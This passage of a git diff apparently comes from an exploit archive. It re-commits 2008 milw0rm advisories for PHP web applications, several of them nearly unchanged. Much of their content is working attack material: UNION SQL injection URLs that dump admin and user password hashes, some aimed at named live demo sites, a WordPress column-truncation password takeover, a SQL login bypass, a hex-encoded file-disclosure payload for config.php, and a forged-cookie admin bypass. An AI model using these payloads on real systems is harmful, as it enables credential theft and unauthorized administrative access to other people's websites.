+# 
+# 
+# POC: For Admin id and pass
+#      index.php?menu=showcat&cat=-1+union+all+select+1,concat(auser,0x3a,apass),3+from+admin-- 
+# 
+# P0C-2: For Users id and pass
+#       index.php?menu=showcat&cat=-1+union+all+select+1,concat(username,0x3a,upass),3+from+users+limit+2,1--
+# 
+# Live Demo: (For admin)
+# 
+# http://payperpostpro.com/index.php?menu=showcat&cat=-1+union+all+select+1,concat(auser,0x3a,apass),3+from+admin--
+#  
+# Live Demo: (For Users)
+#  http://payperpostpro.com/index.php?menu=showcat&cat=-1+union+all+select+1,concat(username,0x3a,upass),3+from+users+limit+1,1--
+#
+#
+# Admin panel is at http://site.com/admin 
+################################################################ 
+# Vuln Discovered 7th Sep 2008 
+
+# milw0rm.com [2008-09-07]
diff --git a/platforms/php/webapps/6397.txt b/platforms/php/webapps/6397.txt
index 8bf1bedc4..0e75a7e6f 100755
--- a/platforms/php/webapps/6397.txt
+++ b/platforms/php/webapps/6397.txt
@@ -1,34 +1,34 @@
-# WordPress 2.6.1 SQL Column Truncation Vulnerability (PoC)
-#
-# found by irk4z[at]yahoo.pl
-# homepage: http://irk4z.wordpress.com/
-#
-# this is not critical vuln [;
-# 
-# first, read this discovery:
-# http://www.suspekt.org/2008/08/18/mysql-and-sql-column-truncation-vulnerabilities/
-#
-# in this hack we can remote change admin password, if registration enabled
-#
-# greets: Stefan Esser, Lukasz Pilorz, cOndemned, tbh, sid.psycho, str0ke and all fiends
-
-1. go to url: server.com/wp-login.php?action=register
-
-2. register as:
-
-login: admin                                                       x
-email: your email
-
-^ admin[55 space chars]x
-
-now, we have duplicated 'admin' account in database
-
-3. go to url: server.com/wp-login.php?action=lostpassword
-
-4. write your email into field and submit this form
-
-5. check your email and go to reset confirmation link
-
-6. admin's password changed, but new password will be send to correct admin email ;/
-
-# milw0rm.com [2008-09-07]
+# WordPress 2.6.1 SQL Column Truncation Vulnerability (PoC)
+#
+# found by irk4z[at]yahoo.pl
+# homepage: http://irk4z.wordpress.com/
+#
+# this is not critical vuln [;
+# 
+# first, read this discovery:
+# http://www.suspekt.org/2008/08/18/mysql-and-sql-column-truncation-vulnerabilities/
+#
+# in this hack we can remote change admin password, if registration enabled
+#
+# greets: Stefan Esser, Lukasz Pilorz, cOndemned, tbh, sid.psycho, str0ke and all fiends
+
+1. go to url: server.com/wp-login.php?action=register
+
+2. register as:
+
+login: admin                                                       x
+email: your email
+
+^ admin[55 space chars]x
+
+now, we have duplicated 'admin' account in database
+
+3. go to url: server.com/wp-login.php?action=lostpassword
+
+4. write your email into field and submit this form
+
+5. check your email and go to reset confirmation link
+
+6. admin's password changed, but new password will be send to correct admin email ;/
+
+# milw0rm.com [2008-09-07]
diff --git a/platforms/php/webapps/6398.txt b/platforms/php/webapps/6398.txt
index a83479ced..fa0516079 100755
--- a/platforms/php/webapps/6398.txt
+++ b/platforms/php/webapps/6398.txt
@@ -1,13 +1,13 @@
-ephpscripts SQL Injection
-Bug Founded By Mormoroth
-This Portal Isnt Free
-Sp TNX to : imm02rtal-Magicboy-Yashi Lashi-DJ7xpl-R$p And Others
-www.mormoroth.net
-www.shabgard.org
-dork : Powered by ephpscripts
-Exploit : Site.com/path/search_results.php?cid=-1/**/union/**/select/**/1,version(),3,4,5,6--
-exp:http://www.ephpscripts.com/demo/eshop/search_results.php?cid=-1/**/union/**/select/**/1,version(),3,4,5,6--
-Persian Gulf Forever
-Iraninan xxxers :D
-
-# milw0rm.com [2008-09-07]
+ephpscripts SQL Injection
+Bug Founded By Mormoroth
+This Portal Isnt Free
+Sp TNX to : imm02rtal-Magicboy-Yashi Lashi-DJ7xpl-R$p And Others
+www.mormoroth.net
+www.shabgard.org
+dork : Powered by ephpscripts
+Exploit : Site.com/path/search_results.php?cid=-1/**/union/**/select/**/1,version(),3,4,5,6--
+exp:http://www.ephpscripts.com/demo/eshop/search_results.php?cid=-1/**/union/**/select/**/1,version(),3,4,5,6--
+Persian Gulf Forever
+Iraninan xxxers :D
+
+# milw0rm.com [2008-09-07]
diff --git a/platforms/php/webapps/6401.txt b/platforms/php/webapps/6401.txt
index c7ceff2f8..e1db7ecc8 100755
--- a/platforms/php/webapps/6401.txt
+++ b/platforms/php/webapps/6401.txt
@@ -1,61 +1,61 @@
-################################################################ 
-#       .___             __          _______       .___        # 
-#     __| _/____ _______|  | __ ____ \   _  \    __| _/____    # 
-#    / __ |\__  \\_  __ \  |/ // ___\/  /_\  \  / __ |/ __ \   # 
-#   / /_/ | / __ \|  | \/    <\  \___\  \_/   \/ /_/ \  ___/   # 
-#   \____ |(______/__|  |__|_ \\_____>\_____  /\_____|\____\   # 
-#        \/                  \/             \/                 # 
-#                   ___________   ______  _  __                # 
-#                 _/ ___\_  __ \_/ __ \ \/ \/ /                # 
-#                 \  \___|  | \/\  ___/\     /                 # 
-#                  \___  >__|    \___  >\/\_/                  # 
-#      est.2007        \/            \/   forum.darkc0de.com   # 
-################################################################ 
-# --d3hydr8 -rsauron-baltazar -sinner_01 -C1c4Tr1Z - beenu     # 
-#  ---QKrun1x-P47tr1ck - FeDeReR -MAGE -JeTFyrE                #
-#                   and all darkc0de members                ---# 
-################################################################ 
-# 
-# Author: r45c4l 
-# 
-# Home  : www.darkc0de.com 
-# 
-# Email : r45c4l@hotmail.com 
-# 
-# Share the c0de! 
-# 
-################################################################ 
-# 
-# Exploit: Alstrasoft Forum (forum_catview&catid) Remote SQL Injection Vulnerability
-#
-#
-# App Name:  AlstraSoft Forum 
-# 
-# App Home: http://www.alstrasoft.com/
-# 
-# Dork1: Use ur brain
-# Dork2: Powered By AlstraSoft Forum Pay Per Post Exchange
-# 
-# 
-# 
-# 
-# 
-# POC: For Admin id and pass
-#      index.php?menu=forum_catview&catid=-1+union+all+select+1,2,3,4,5,concat(auser,0x3a,apass),7+from+admin--
-# 
-# P0C-2: For Users id and pass
-#       index.php?menu=forum_catview&catid=-1+union+all+select+1,2,3,4,5,concat(username,0x3a,upass),7+from+users--
-# 
-# Live Demo: (For admin)
-# 
-# http://payperpostpro.com/index.php?menu=forum_catview&catid=-1+union+all+select+1,2,3,4,5,concat(auser,0x3a,apass),7+from+admin--
-#  
-# Live Demo: (For Users)
-#  
-# http://payperpostpro.com/index.php?menu=forum_catview&catid=-1+union+all+select+1,2,3,4,5,concat(username,0x3a,upass),7+from+users--
-#
-# Admin panel is at http://site.com/admin 
-################################################################ 
-# Vuln Discovered 9th Sep 2008 
-
-# milw0rm.com [2008-09-09]
+################################################################ 
+#       .___             __          _______       .___        # 
+#     __| _/____ _______|  | __ ____ \   _  \    __| _/____    # 
+#    / __ |\__  \\_  __ \  |/ // ___\/  /_\  \  / __ |/ __ \   # 
+#   / /_/ | / __ \|  | \/    <\  \___\  \_/   \/ /_/ \  ___/   # 
+#   \____ |(______/__|  |__|_ \\_____>\_____  /\_____|\____\   # 
+#        \/                  \/             \/                 # 
+#                   ___________   ______  _  __                # 
+#                 _/ ___\_  __ \_/ __ \ \/ \/ /                # 
+#                 \  \___|  | \/\  ___/\     /                 # 
+#                  \___  >__|    \___  >\/\_/                  # 
+#      est.2007        \/            \/   forum.darkc0de.com   # 
+################################################################ 
+# --d3hydr8 -rsauron-baltazar -sinner_01 -C1c4Tr1Z - beenu     # 
+#  ---QKrun1x-P47tr1ck - FeDeReR -MAGE -JeTFyrE                #
+#                   and all darkc0de members                ---# 
+################################################################ 
+# 
+# Author: r45c4l 
+# 
+# Home  : www.darkc0de.com 
+# 
+# Email : r45c4l@hotmail.com 
+# 
+# Share the c0de! 
+# 
+################################################################ 
+# 
+# Exploit: Alstrasoft Forum (forum_catview&catid) Remote SQL Injection Vulnerability
+#
+#
+# App Name:  AlstraSoft Forum 
+# 
+# App Home: http://www.alstrasoft.com/
+# 
+# Dork1: Use ur brain
+# Dork2: Powered By AlstraSoft Forum Pay Per Post Exchange
+# 
+# 
+# 
+# 
+# 
+# POC: For Admin id and pass
+#      index.php?menu=forum_catview&catid=-1+union+all+select+1,2,3,4,5,concat(auser,0x3a,apass),7+from+admin--
+# 
+# P0C-2: For Users id and pass
+#       index.php?menu=forum_catview&catid=-1+union+all+select+1,2,3,4,5,concat(username,0x3a,upass),7+from+users--
+# 
+# Live Demo: (For admin)
+# 
+# http://payperpostpro.com/index.php?menu=forum_catview&catid=-1+union+all+select+1,2,3,4,5,concat(auser,0x3a,apass),7+from+admin--
+#  
+# Live Demo: (For Users)
+#  
+# http://payperpostpro.com/index.php?menu=forum_catview&catid=-1+union+all+select+1,2,3,4,5,concat(username,0x3a,upass),7+from+users--
+#
+# Admin panel is at http://site.com/admin 
+################################################################ 
+# Vuln Discovered 9th Sep 2008 
+
+# milw0rm.com [2008-09-09]
diff --git a/platforms/php/webapps/6402.txt b/platforms/php/webapps/6402.txt
index 80fd786e5..e14a0856a 100755
--- a/platforms/php/webapps/6402.txt
+++ b/platforms/php/webapps/6402.txt
@@ -1,35 +1,35 @@
-#####################################################################################
-####           Stash v1.0.3 Admin bypass / Remote File Disclosure                ####
-#####################################################################################
-#                                                                                   #
-#AUTHOR : IRCRASH (R3d.W0rm (Sina Yazdanmehr))                                      #
-#Discovered by : IRCRASH (R3d.W0rm (Sina Yazdanmehr))                               #
-#Our Site : Http://IRCRASH.COM                                                      #
-#IRCRASH Team Members : Dr.Crash - R3d.w0rm (Sina Yazdanmehr)                       #
-#####################################################################################
-#                                                                                   #
-#Download : http://kent.dl.sourceforge.net/sourceforge/nice-stash/stash-1.0.3.tar.gz#
-#                                                                                   #
-#DORK : :(                                                                          #
-#                                                                                   #
-#####################################################################################
-#                                [Admin by pass]                                    #
-#                                                                                   #
-#http://Site/[path]/admin/login                                                     #
-#Username : ' or 1=1/*                                                              #
-#Password : R3d.W0rm                                                                #
-#                                                                                   #
-#####################################################################################
-#                            [Remote File Disclosure]                               #
-#                                                                                   #
-#http://Site/[path]/downloadmp3.php?download=-99999'+union+select+0,1,2,3,4,concat(0x[file name in hex])/* 
-#                                                                                   #
-#Note : You must enter file name in hex in valun address to download it .           #
-#Ex. ../../admin/config.php == 2E2E2F2E2E2F61646D696E2F636F6E6669672E706870         #
-#http://Site/[path]/downloadmp3.php?download=-99999'+union+select+0,1,2,3,4,concat(0x2E2E2F2E2E2F61646D696E2F636F6E6669672E706870)/* 
-#                                                                                   #
-#####################################################################################
-#                           Site : Http://IRCRASH.COM                               #
-###################################### TNX GOD ######################################
-
-# milw0rm.com [2008-09-09]
+#####################################################################################
+####           Stash v1.0.3 Admin bypass / Remote File Disclosure                ####
+#####################################################################################
+#                                                                                   #
+#AUTHOR : IRCRASH (R3d.W0rm (Sina Yazdanmehr))                                      #
+#Discovered by : IRCRASH (R3d.W0rm (Sina Yazdanmehr))                               #
+#Our Site : Http://IRCRASH.COM                                                      #
+#IRCRASH Team Members : Dr.Crash - R3d.w0rm (Sina Yazdanmehr)                       #
+#####################################################################################
+#                                                                                   #
+#Download : http://kent.dl.sourceforge.net/sourceforge/nice-stash/stash-1.0.3.tar.gz#
+#                                                                                   #
+#DORK : :(                                                                          #
+#                                                                                   #
+#####################################################################################
+#                                [Admin by pass]                                    #
+#                                                                                   #
+#http://Site/[path]/admin/login                                                     #
+#Username : ' or 1=1/*                                                              #
+#Password : R3d.W0rm                                                                #
+#                                                                                   #
+#####################################################################################
+#                            [Remote File Disclosure]                               #
+#                                                                                   #
+#http://Site/[path]/downloadmp3.php?download=-99999'+union+select+0,1,2,3,4,concat(0x[file name in hex])/* 
+#                                                                                   #
+#Note : You must enter file name in hex in valun address to download it .           #
+#Ex. ../../admin/config.php == 2E2E2F2E2E2F61646D696E2F636F6E6669672E706870         #
+#http://Site/[path]/downloadmp3.php?download=-99999'+union+select+0,1,2,3,4,concat(0x2E2E2F2E2E2F61646D696E2F636F6E6669672E706870)/* 
+#                                                                                   #
+#####################################################################################
+#                           Site : Http://IRCRASH.COM                               #
+###################################### TNX GOD ######################################
+
+# milw0rm.com [2008-09-09]
diff --git a/platforms/php/webapps/6403.txt b/platforms/php/webapps/6403.txt
index 08fec73b7..1a65225c5 100755
--- a/platforms/php/webapps/6403.txt
+++ b/platforms/php/webapps/6403.txt
@@ -1,46 +1,46 @@
-###########################################################
-# 
-#        ___    __ __                  __  __            
-#       /\_ \  /\ \\ \                /\ \/\ \           
-#   ____\//\ \ \ \ \\ \    __  _ __  _\ \ \ \ \  ____    
-#  /',__\ \ \ \ \ \ \\ \_ /\ \/'\\ \/'\\ \ \ \ \/\_ ,`\  
-# /\__, `\ \_\ \_\ \__ ,__\\>  <\\>   <\\ \ \_\ \/_/  /_ 
-# \/\____/ /\____\\/_/\_\_//\_/\_\\_/\_\ \ \_____\/\____\
-#  \/___/  \/____/   \/_/  \//\/_///\/_/  \/_____/\/____/
-# 
-#                                 security breakd0wn!
-###########################################################
-# 
-# Title: Hot Links SQL-PHP 3 (report.php) Multiple Vulnerabilities
-# Vendor: http://www.mrcgiguy.com
-# Vulnerable Version: 3 and prior versions
-# Fix: N/A
-# 
-###########################################################
-# 
-# c0ntact: sl4x.xuz[at]gmail[dot]com
-# d0rk: "Powered By: Hot Links SQL-PHP 3"
-# stop lammo
-# 
-###########################################################
-
-######################
-  1. Information
-######################
-     Hot Links was the initial script developed by Mr CGI Guy back in 2001 as a simple way to manage outgoing links. It intially was introduced as Hot Links Lite and was distributed for free.
-
-######################
-  2. Vulnerabilities
-######################
-     SQL Injection in "report.php" in the "id" parameter.
-     Cross Site Scripting in "report.php" in the "id" parameter.
-
-######################
-  3. PoC
-######################
-     http://localhost/path/report.php?id=-1/**/union/**/select/**/version(),2,3--
-     http://localhost/path/report.php?id=[XSS]
-
-###########################################################
-
-# milw0rm.com [2008-09-09]
+###########################################################
+# 
+#        ___    __ __                  __  __            
+#       /\_ \  /\ \\ \                /\ \/\ \           
+#   ____\//\ \ \ \ \\ \    __  _ __  _\ \ \ \ \  ____    
+#  /',__\ \ \ \ \ \ \\ \_ /\ \/'\\ \/'\\ \ \ \ \/\_ ,`\  
+# /\__, `\ \_\ \_\ \__ ,__\\>  <\\>   <\\ \ \_\ \/_/  /_ 
+# \/\____/ /\____\\/_/\_\_//\_/\_\\_/\_\ \ \_____\/\____\
+#  \/___/  \/____/   \/_/  \//\/_///\/_/  \/_____/\/____/
+# 
+#                                 security breakd0wn!
+###########################################################
+# 
+# Title: Hot Links SQL-PHP 3 (report.php) Multiple Vulnerabilities
+# Vendor: http://www.mrcgiguy.com
+# Vulnerable Version: 3 and prior versions
+# Fix: N/A
+# 
+###########################################################
+# 
+# c0ntact: sl4x.xuz[at]gmail[dot]com
+# d0rk: "Powered By: Hot Links SQL-PHP 3"
+# stop lammo
+# 
+###########################################################
+
+######################
+  1. Information
+######################
+     Hot Links was the initial script developed by Mr CGI Guy back in 2001 as a simple way to manage outgoing links. It intially was introduced as Hot Links Lite and was distributed for free.
+
+######################
+  2. Vulnerabilities
+######################
+     SQL Injection in "report.php" in the "id" parameter.
+     Cross Site Scripting in "report.php" in the "id" parameter.
+
+######################
+  3. PoC
+######################
+     http://localhost/path/report.php?id=-1/**/union/**/select/**/version(),2,3--
+     http://localhost/path/report.php?id=[XSS]
+
+###########################################################
+
+# milw0rm.com [2008-09-09]
diff --git a/platforms/php/webapps/6404.txt b/platforms/php/webapps/6404.txt
index 21cf3f8a2..0bf39411d 100755
--- a/platforms/php/webapps/6404.txt
+++ b/platforms/php/webapps/6404.txt
@@ -1,64 +1,63 @@
-
-                          ||          ||   | ||        
-                   o_,_7 _||  . _o_7 _|| 4_|_||  o_w_, 
-                  ( :   /    (_)    /           (   .  
-|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
-|     _                   __           __       __          ______     |
-|   /' \            __  /'__`\        /\ \__  /'__`\       /\  ___\    |
-|  /\_, \    ___   /\_\/\_\L\ \    ___\ \ ,_\/\ \/\ \  _ __\ \ \__/    |
-|  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\ \___``\  |
-|     \ \ \/\ \/\ \ \ \ \/\ \L\ \/\ \__/\ \ \_\ \ \_\ \ \ \/ \/\ \L\ \ |
-|      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\  \ \____/ |
-|       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/   \/___/  |
-|                  \ \____/ >> Kings of injection                      |
-|                   \/___/                                             |
-|                                                                      |
-|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
-
-
-<> Found by  :  Cyb3r-1sT
-
-<> C0ntact : cyb3r-1st [at] hotmail.com 
-                   
-<> Groups : InjEctOr5 T3am 
-
-
-=======================================================
-++++++++++++++++++++ Script information++++++++++++++++++++++
-=======================================================
-
-
-<<->> script      : live-tv-script
-
-<<->> script site : www.livetvscript.com                 
-
-
-
-=======================================================
-++++++++++++++++++++++++ Exploit +++++++++++++++++++++++++
-=======================================================
-
-
-<<->> D0rk    : find it
-
-<<->> Exploit :>>>
-
-          >>>> www.site.me/patch/index.php?mid=-99999+union+select+0,unhex(hex(concat(uid,0x3a,pwd))),0,0+from+admin/*
-
-
-=======================================================
-+++++++++++++++++++++++ Greetz ++++++++++++++++++++++++
-=======================================================
-
-
-<<->>  freinds :: titanichacker $ arb-hawk $ denm0 $ drbaka  $ nicehacker 
-                           anaconda-ksa $ sirus $ br1ght-dark  $ Golden-zero $ crazy-x 
-                    
-
-<<->> InjEctOr5 TeaM freinds  :: abo-najm $ Eng.Silent Night  $ spid3r-net $ hacker-b0y $ qalbhamad $ Mr.Dangers - RooT-HacKer - 07 - fisher - ToTal
-
-
-
-<<->> All muslims
-
-# milw0rm.com [2008-09-09]
+                          ||          ||   | ||        
+                   o_,_7 _||  . _o_7 _|| 4_|_||  o_w_, 
+                  ( :   /    (_)    /           (   .  
+|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
+|     _                   __           __       __          ______     |
+|   /' \            __  /'__`\        /\ \__  /'__`\       /\  ___\    |
+|  /\_, \    ___   /\_\/\_\L\ \    ___\ \ ,_\/\ \/\ \  _ __\ \ \__/    |
+|  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\ \___``\  |
+|     \ \ \/\ \/\ \ \ \ \/\ \L\ \/\ \__/\ \ \_\ \ \_\ \ \ \/ \/\ \L\ \ |
+|      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\  \ \____/ |
+|       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/   \/___/  |
+|                  \ \____/ >> Kings of injection                      |
+|                   \/___/                                             |
+|                                                                      |
+|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
+
+
+<> Found by  :  Cyb3r-1sT
+
+<> C0ntact : cyb3r-1st [at] hotmail.com 
+                   
+<> Groups : InjEctOr5 T3am 
+
+
+=======================================================
+++++++++++++++++++++ Script information++++++++++++++++++++++
+=======================================================
+
+
+<<->> script      : live-tv-script
+
+<<->> script site : www.livetvscript.com                 
+
+
+
+=======================================================
+++++++++++++++++++++++++ Exploit +++++++++++++++++++++++++
+=======================================================
+
+
+<<->> D0rk    : find it
+
+<<->> Exploit :>>>
+
+          >>>> www.site.me/patch/index.php?mid=-99999+union+select+0,unhex(hex(concat(uid,0x3a,pwd))),0,0+from+admin/*
+
+
+=======================================================
++++++++++++++++++++++++ Greetz ++++++++++++++++++++++++
+=======================================================
+
+
+<<->>  freinds :: titanichacker $ arb-hawk $ denm0 $ drbaka  $ nicehacker 
+                           anaconda-ksa $ sirus $ br1ght-dark  $ Golden-zero $ crazy-x 
+                    
+
+<<->> InjEctOr5 TeaM freinds  :: abo-najm $ Eng.Silent Night  $ spid3r-net $ hacker-b0y $ qalbhamad $ Mr.Dangers - RooT-HacKer - 07 - fisher - ToTal
+
+
+
+<<->> All muslims
+
+# milw0rm.com [2008-09-09]
diff --git a/platforms/php/webapps/6406.txt b/platforms/php/webapps/6406.txt
index 3f09d68be..ed39f9443 100755
--- a/platforms/php/webapps/6406.txt
+++ b/platforms/php/webapps/6406.txt
@@ -1,37 +1,37 @@
-  ####################################################################################################
-  #                                                                                                  #
-  #           ...:::::stash-1.0.3 Insecure Cookie Handling Vulnerability ::::....                    #          
-  ###################################################################################################
-
-
------------------------
-Discoverd By : Ciph3r
-
-special tnx to : Iranian hacker & Kurdish Security TEAM
-
-E-Mail : Ciph3r_blackhat@yahoo.com
-
-cms :  http://sourceforge.net/project/showfiles.php?group_id=206129
------------------------
-DESCRIPTION:
-
-stash-1.0.3, suffers from insecure cookie handling, when a admin login is successfull the script creates
-a cookie to show the rest of the admin area the user is already logged in. the bad thing is the cookie doesnt
-contain any password or anything alike, therefor we can craft a admin cookie and make it look like we are
-logged in as a legit admin.
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
-vuln code in  admin/login.php
-
-
-if(isset($_COOKIE['bsm'])&&isset($_COOKIE['msb'])){
-        $authenticate->checkCookie($_COOKIE['bsm'],$_COOKIE['msb']);
-
-
------------------------------------------
-exploit:
-javascript:document.cookie = "bsm=1; path=/"; 
------
-now you can get admin access and manage the cms ;)
--------------------------------------------
-
-# milw0rm.com [2008-09-09]
+  ####################################################################################################
+  #                                                                                                  #
+  #           ...:::::stash-1.0.3 Insecure Cookie Handling Vulnerability ::::....                    #          
+  ###################################################################################################
+
+
+-----------------------
+Discoverd By : Ciph3r
+
+special tnx to : Iranian hacker & Kurdish Security TEAM
+
+E-Mail : Ciph3r_blackhat@yahoo.com
+
+cms :  http://sourceforge.net/project/showfiles.php?group_id=206129
+-----------------------
+DESCRIPTION:
+
+stash-1.0.3, suffers from insecure cookie handling, when a admin login is successfull the script creates
+a cookie to show the rest of the admin area the user is already logged in. the bad thing is the cookie doesnt
+contain any password or anything alike, therefor we can craft a admin cookie and make it look like we are
+logged in as a legit admin.
+=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
+vuln code in  admin/login.php
+
+
+if(isset($_COOKIE['bsm'])&&isset($_COOKIE['msb'])){
+        $authenticate->checkCookie($_COOKIE['bsm'],$_COOKIE['msb']);
+
+
+-----------------------------------------
+exploit:
+javascript:document.cookie = "bsm=1; path=/"; 
+-----
+now you can get admin access and manage the cms ;)
+-------------------------------------------
+
+# milw0rm.com [2008-09-09]
diff --git a/platforms/php/webapps/6408.txt b/platforms/php/webapps/6408.txt
index 24a6c34f8..57fb2cfb0 100755
--- a/platforms/php/webapps/6408.txt
+++ b/platforms/php/webapps/6408.txt
@@ -1,51 +1,51 @@
-#################################################################################################
-####################################  proud to be muslim   ######################################
-###                                                                                           ###
-###                            rEm0te sql injction VulnErability                              ###
-###                                                                                           ###
-###                                    (cmsbuzz script)                                       ###
-###                                                                                           ###
-#################################################################################################
-#################################################################################################
-###                                                                                           ###
-### AuTh0r : security fears team                                                              ###
-###                                                                                           ###
-### Home   : WwW.alsonaa.com                                                                  ###
-###                                                                                           ###    
-### members: HeB4RieH , germaya_x                                                             ###
-###                                                                                           ###
-#################################################################################################
-#################################################################################################
-###                                                                                           ###
-### Script Name : cmsbuzz                                                                     ###
-###                                                                                           ###
-### download    : http://cmsbuzz.com/purchase.php                                             ###
-###                                                                                           ###
-### Email       : s-fteam@securityfears.cc                                                    ###
-#################################################################################################
-#################################################################################################
-###                                                                                           ###
-### d0rk ::  "use your mind"                                                                  ###
-###                                                                                           ###
-###                                                                                           ###
-### -(:: sql Code ::)-                                                                        ###
-###        ?action=playgame&id=(sql)                                                          ###
-###(sql)=-6+union+select+1,2,3,concat_ws(0x3a3a,username,upasswd),5,6,7,8,9,10,11,12,13+from+tbl_userprofile--                           
-###                                                                                           ###
-#################################################################################################
-###                                                                                           ###
-### -(::  l!ve demo ::)-                                                                      ###
-###                                                                                           ###
-###http://demo.cmsbuzz.com/?action=playgame&id=-6+union+select+1,2,3,concat_ws(0x3a3a,username,upasswd),5,6,7,8,9,10,11,12,13+from+tbl_userprofile--
-###                                                                                           ###
-###                                                                                           ###
-########################                                                    #####################
-########################                                                    #####################
-#################################################################################################
-#################################################################################################
-                                   -(:: !GreTzZ! ::)-
- ::SnIpEr.KiLLeR::fa6al error::black cheetah::X_HaCker::str0ke::MusliMs HaCkErs:: 
-#################################################################################################
-#################################################################################################
-
-# milw0rm.com [2008-09-09]
+#################################################################################################
+####################################  proud to be muslim   ######################################
+###                                                                                           ###
+###                            rEm0te sql injction VulnErability                              ###
+###                                                                                           ###
+###                                    (cmsbuzz script)                                       ###
+###                                                                                           ###
+#################################################################################################
+#################################################################################################
+###                                                                                           ###
+### AuTh0r : security fears team                                                              ###
+###                                                                                           ###
+### Home   : WwW.alsonaa.com                                                                  ###
+###                                                                                           ###    
+### members: HeB4RieH , germaya_x                                                             ###
+###                                                                                           ###
+#################################################################################################
+#################################################################################################
+###                                                                                           ###
+### Script Name : cmsbuzz                                                                     ###
+###                                                                                           ###
+### download    : http://cmsbuzz.com/purchase.php                                             ###
+###                                                                                           ###
+### Email       : s-fteam@securityfears.cc                                                    ###
+#################################################################################################
+#################################################################################################
+###                                                                                           ###
+### d0rk ::  "use your mind"                                                                  ###
+###                                                                                           ###
+###                                                                                           ###
+### -(:: sql Code ::)-                                                                        ###
+###        ?action=playgame&id=(sql)                                                          ###
+###(sql)=-6+union+select+1,2,3,concat_ws(0x3a3a,username,upasswd),5,6,7,8,9,10,11,12,13+from+tbl_userprofile--                           
+###                                                                                           ###
+#################################################################################################
+###                                                                                           ###
+### -(::  l!ve demo ::)-                                                                      ###
+###                                                                                           ###
+###http://demo.cmsbuzz.com/?action=playgame&id=-6+union+select+1,2,3,concat_ws(0x3a3a,username,upasswd),5,6,7,8,9,10,11,12,13+from+tbl_userprofile--
+###                                                                                           ###
+###                                                                                           ###
+########################                                                    #####################
+########################                                                    #####################
+#################################################################################################
+#################################################################################################
+                                   -(:: !GreTzZ! ::)-
+ ::SnIpEr.KiLLeR::fa6al error::black cheetah::X_HaCker::str0ke::MusliMs HaCkErs:: 
+#################################################################################################
+#################################################################################################
+
+# milw0rm.com [2008-09-09]
diff --git a/platforms/php/webapps/6409.txt b/platforms/php/webapps/6409.txt
index 02386215d..eded6f099 100755
--- a/platforms/php/webapps/6409.txt
+++ b/platforms/php/webapps/6409.txt
@@ -1,46 +1,46 @@
-###########################################################
-# 
-#        ___    __ __                  __  __            
-#       /\_ \  /\ \\ \                /\ \/\ \           
-#   ____\//\ \ \ \ \\ \    __  _ __  _\ \ \ \ \  ____    
-#  /',__\ \ \ \ \ \ \\ \_ /\ \/'\\ \/'\\ \ \ \ \/\_ ,`\  
-# /\__, `\ \_\ \_\ \__ ,__\\>  <\\>   <\\ \ \_\ \/_/  /_ 
-# \/\____/ /\____\\/_/\_\_//\_/\_\\_/\_\ \ \_____\/\____\
-#  \/___/  \/____/   \/_/  \//\/_///\/_/  \/_____/\/____/
-# 
-#                                 security breakd0wn!
-###########################################################
-# 
-# Title: Availscript Article Script (articles.php) Multiple Vulnerabilities
-# Vendor: http://www.availscript.com/
-# Vulnerable Version: N/A
-# Fix: N/A
-# 
-###########################################################
-# 
-# c0ntact: sl4x.xuz[at]gmail[dot]com
-# d0rk: "assh0le"
-# stop lammo
-# 
-###########################################################
-
-######################
-  1. Information
-######################
-     Article Script allows you to publish your own articles or from the publishers or authors. Aministrator can go to admin page to edit, delete or manage articles, authors and categories. and the member can post articles as an author or just can read the articles.
-
-######################
-  2. Vulnerabilities
-######################
-     SQL Injection in "articles.php" in the "aIDS" parameter.
-     Cross Site Scripting in "articles.php" in the "aIDS" parameter.
-
-######################
-  3. PoC
-######################
-     http://localhost/path/articles.php?aIDS=-1+union+select+1,2,user()--
-     http://localhost/path/articles.php?aIDS=[XSS]
-
-###########################################################
-
-# milw0rm.com [2008-09-09]
+###########################################################
+# 
+#        ___    __ __                  __  __            
+#       /\_ \  /\ \\ \                /\ \/\ \           
+#   ____\//\ \ \ \ \\ \    __  _ __  _\ \ \ \ \  ____    
+#  /',__\ \ \ \ \ \ \\ \_ /\ \/'\\ \/'\\ \ \ \ \/\_ ,`\  
+# /\__, `\ \_\ \_\ \__ ,__\\>  <\\>   <\\ \ \_\ \/_/  /_ 
+# \/\____/ /\____\\/_/\_\_//\_/\_\\_/\_\ \ \_____\/\____\
+#  \/___/  \/____/   \/_/  \//\/_///\/_/  \/_____/\/____/
+# 
+#                                 security breakd0wn!
+###########################################################
+# 
+# Title: Availscript Article Script (articles.php) Multiple Vulnerabilities
+# Vendor: http://www.availscript.com/
+# Vulnerable Version: N/A
+# Fix: N/A
+# 
+###########################################################
+# 
+# c0ntact: sl4x.xuz[at]gmail[dot]com
+# d0rk: "assh0le"
+# stop lammo
+# 
+###########################################################
+
+######################
+  1. Information
+######################
+     Article Script allows you to publish your own articles or from the publishers or authors. Aministrator can go to admin page to edit, delete or manage articles, authors and categories. and the member can post articles as an author or just can read the articles.
+
+######################
+  2. Vulnerabilities
+######################
+     SQL Injection in "articles.php" in the "aIDS" parameter.
+     Cross Site Scripting in "articles.php" in the "aIDS" parameter.
+
+######################
+  3. PoC
+######################
+     http://localhost/path/articles.php?aIDS=-1+union+select+1,2,user()--
+     http://localhost/path/articles.php?aIDS=[XSS]
+
+###########################################################
+
+# milw0rm.com [2008-09-09]
